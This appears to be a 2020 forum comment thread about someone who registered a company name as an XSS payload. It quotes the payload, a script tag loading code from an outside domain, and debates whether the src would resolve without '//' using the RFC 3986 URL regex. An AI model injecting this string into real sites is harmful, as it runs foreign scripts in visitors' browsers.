Will that even work without http:// or at least // in front of the domain name? ...

tim333 · on Oct 29, 2020

Seems to have a bit. Cut and paste from the guy who set up \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

>I am in the process of contacting every website that has triggered my script which has a readily available contact for submitting security issues, or a hackerone account or similar. Alas, the sort of websites that have XSS problems rarely list IT security contacts.

wahern · on Oct 29, 2020

I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?

See https://tools.ietf.org/html/rfc3986#appendix-B

The authority section (which contains the host domain) must begin with "//" whether there's a scheme prefix or not. Otherwise it's just part of the path (or query or fragment). IIRC, these semantics are also fixed by HTML such that any attribute like HREF or SRC is parsed as-if using the canonical regex (but after entity substitution and whitespace trimming). Browsers might have implemented this differently many years ago, but I doubt it as it would conflict with being able to use a bare path atom (e.g. foo.html).

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.

bearbin · on Oct 29, 2020

It had HTTP originally, twitter just munged it.